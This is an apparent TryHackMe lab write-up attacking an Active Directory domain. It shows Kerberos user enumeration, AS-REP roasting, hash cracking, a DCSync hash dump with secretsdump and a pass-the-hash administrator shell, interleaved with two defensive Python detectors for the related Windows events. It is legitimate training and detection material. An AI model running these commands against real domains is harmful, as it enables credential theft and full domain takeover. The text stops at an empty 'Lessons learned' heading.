TryHackMe Medium Windows Active Directory Kerberos

Attacktive Directory

Enumeration and attack of an Active Directory environment. Kerberoasting, AS-REP Roasting and Pass-the-Hash against the spookysec.local domain.

Jul 2022 ~90 min cat4clysm
Tools used
nmap kerbrute impacket hashcat evil-winrm secretsdump

Reconnaissance

The port scan reveals a full Windows AD environment with Kerberos, LDAP, SMB and RDP.

root@kali:~$
nmap -sC -sV -p53,80,88,135,139,389,445,3268,3389,5985 -Pn 10.10.241.225
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: spookysec.local)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI (WinRM)

We enumerate domain users with Kerbrute:

root@kali:~$
kerbrute userenum --dc 10.10.241.225 -d spookysec.local userlist.txt
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]

AS-REP Roasting

We look for accounts with DONT_REQUIRE_PREAUTH set so we can obtain hashes without authenticating.

root@kali:~$
python3 GetNPUsers.py spookysec.local/ -usersfile valid_users.txt -dc-ip 10.10.241.225 -no-pass

We crack the hash with hashcat:

root@kali:~$
hashcat -m 18200 hash.txt passwordlist.txt --force
[email protected]:...:management2005
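Both the Kerbrute enumeration above and the AS-REP roast leave traces in the domain controller's Security log, so here is an added detection example for this writeup (not part of the original page, of kerbrute or of impacket). It runs over constructed event 4768 records: a burst of "unknown principal" failures (status 0x6) from one client address is the user enumeration, and a successful TGT with PreAuthType 0 and an RC4 ticket (etype 0x17) is the crackable AS-REP that hashcat mode 18200 consumes. The user names and addresses are hypothetical.

```python
"""Detect Kerberos user enumeration and AS-REP roasting from event 4768.

Added example for this writeup; it is not part of the original page, of
kerbrute or of impacket. With Kerberos authentication auditing enabled a
domain controller logs every TGT request as Security event 4768. Two of
the steps in this writeup are visible there:
  * kerbrute userenum: several 4768 failures with status 0x6
    (KDC_ERR_C_PRINCIPAL_UNKNOWN) from the same client address;
  * GetNPUsers.py: a successful 4768 with PreAuthType 0 (no
    pre-authentication) and TicketEncryptionType 0x17 (RC4), which is
    exactly what hashcat -m 18200 cracks offline.
Event records, users and hosts below are constructed, not from the lab.
"""
from collections import Counter
from dataclasses import dataclass

RC4_HMAC = 0x17                    # etype 23, crackable offline
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6  # "no such user" failure code


@dataclass
class TgtRequest:                  # the 4768 fields this check uses
    target_user: str
    client_ip: str
    pre_auth_type: int             # 0 = no pre-authentication data sent, 2 = PA-ENC-TIMESTAMP
    ticket_encryption_type: int
    status: int                    # 0x0 = TGT issued


# Constructed sample events (hypothetical users and addresses).
SAMPLE_EVENTS = [
    TgtRequest("ghost1", "10.10.14.7", 0, RC4_HMAC, KDC_ERR_C_PRINCIPAL_UNKNOWN),
    TgtRequest("ghost2", "10.10.14.7", 0, RC4_HMAC, KDC_ERR_C_PRINCIPAL_UNKNOWN),
    TgtRequest("ghost3", "10.10.14.7", 0, RC4_HMAC, KDC_ERR_C_PRINCIPAL_UNKNOWN),
    TgtRequest("svc-admin", "10.10.14.7", 0, RC4_HMAC, 0x0),  # AS-REP roast
    TgtRequest("backup", "10.10.14.7", 0, 0x12, 0x0),         # no preauth, but AES ticket
    TgtRequest("james", "10.10.10.5", 2, 0x12, 0x0),          # normal logon with preauth
    TgtRequest("typo", "10.10.10.5", 0, 0x12, KDC_ERR_C_PRINCIPAL_UNKNOWN),  # one mistyped name
]


def is_asrep_roast(ev: TgtRequest) -> bool:
    """A TGT issued with no pre-auth and an RC4 session key is crackable offline."""
    return ev.pre_auth_type == 0 and ev.ticket_encryption_type == RC4_HMAC and ev.status == 0


def find_asrep_roasting(events):
    """Accounts whose AS-REP was handed out in crackable form."""
    return [ev.target_user for ev in events if is_asrep_roast(ev)]


def accounts_without_preauth(events):
    """Audit list: every account that got a TGT without pre-auth, whatever the
    etype. These are the DONT_REQUIRE_PREAUTH flags to remove."""
    return sorted({ev.target_user for ev in events
                   if ev.pre_auth_type == 0 and ev.status == 0})


def enumeration_sources(events, threshold=3):
    """Client addresses that hit 'unknown principal' at least `threshold` times."""
    unknown = Counter(ev.client_ip for ev in events
                      if ev.status == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return sorted(ip for ip, n in unknown.items() if n >= threshold)


if __name__ == "__main__":
    print("AS-REP roasted:", find_asrep_roasting(SAMPLE_EVENTS))
    print("no preauth required:", accounts_without_preauth(SAMPLE_EVENTS))
    print("enumeration from:", enumeration_sources(SAMPLE_EVENTS))
```

The `backup` account is deliberately in the sample: it also has pre-authentication disabled, but because its ticket is AES the roast condition does not fire, which is why the audit list (`accounts_without_preauth`) is kept separate from the alert (`find_asrep_roasting`). The real fix is clearing the flag on every account in that audit list; the etype check only tells you which ones are cheap to crack.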

Privilege Escalation: Secretsdump & Pass-the-Hash

With svc-admin's credentials we dump the NTLM hashes of the whole domain:

root@kali:~$
python3 secretsdump.py -just-dc spookysec.local/svc-admin:[email protected]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:hash_ntlm:::
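`secretsdump.py -just-dc` does not read the NTDS database from disk; it asks the domain controller to replicate the directory (DCSync). As an added detection example for this writeup (not part of the original page or of impacket), the block below runs over constructed Security event 4662 records and flags replication control-access requests that do not come from a known domain controller account. The account and host names are hypothetical; the two replication-right GUIDs are the well-known Active Directory values.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.

Added example for this writeup; not part of the original page or of impacket.
secretsdump.py -just-dc obtains the NTLM hashes by asking the domain
controller to replicate directory data, which requires the
DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control
access rights on the domain object. With "Audit Directory Service Access"
enabled, the DC logs event 4662 with AccessMask 0x100 (control access) and
those rights' GUIDs in the Properties field. Only other domain controllers
should replicate, so the same event from an ordinary account is the signal.
Event records below are constructed, not taken from the lab.
"""
from dataclasses import dataclass, field

# Well-known control access right GUIDs used by directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100             # ADS_RIGHT_DS_CONTROL_ACCESS bit in AccessMask


@dataclass
class DsAccessEvent:               # the 4662 fields this check uses
    subject_user: str              # SubjectUserName
    access_mask: int               # AccessMask
    properties: list = field(default_factory=list)   # Properties, as {GUID} strings


def _normalise(guid: str) -> str:
    return guid.strip("{}").lower()


def is_dcsync(ev: DsAccessEvent, allowed_dcs=frozenset()) -> bool:
    """True when a principal other than a known DC exercises a replication right."""
    if ev.subject_user.endswith("$") and ev.subject_user.upper() in allowed_dcs:
        return False                            # a listed domain controller replicating
    if not ev.access_mask & CONTROL_ACCESS:
        return False                            # not a control-access operation
    props = {_normalise(p) for p in ev.properties}
    return bool(props & REPLICATION_RIGHTS)


def find_dcsync(events, allowed_dcs=frozenset()):
    return [ev.subject_user for ev in events if is_dcsync(ev, allowed_dcs)]


# Constructed sample events (hypothetical names; the last GUID is a made-up
# unrelated property, not a real schema identifier).
DC_ACCOUNTS = frozenset({"LABDC01$"})
SAMPLE_EVENTS = [
    DsAccessEvent("LABDC01$", 0x100, ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                                      "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]),  # normal DC replication
    DsAccessEvent("svc-admin", 0x100, ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                                       "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]),  # secretsdump -just-dc
    DsAccessEvent("james", 0x10, ["{00000000-0000-0000-0000-000000000001}"]),       # ordinary read
    DsAccessEvent("WS01$", 0x100, ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]),      # machine account, not a DC
]

if __name__ == "__main__":
    print("DCSync from:", find_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS))
```

The allowlist is keyed on account name only to keep the example short; in production, derive it from membership of the Domain Controllers OU rather than a static set, since an attacker who can create a machine account can pick any name ending in `$` (the `WS01$` sample shows why a bare "ends with `$`" check is not enough).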

Pass-the-Hash with Evil-WinRM:

root@kali:~$
evil-winrm -i 10.10.241.225 -u Administrator -H <NTLM_HASH>
Evil-WinRM shell v3.4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
thm-ad\administrator

Lessons learned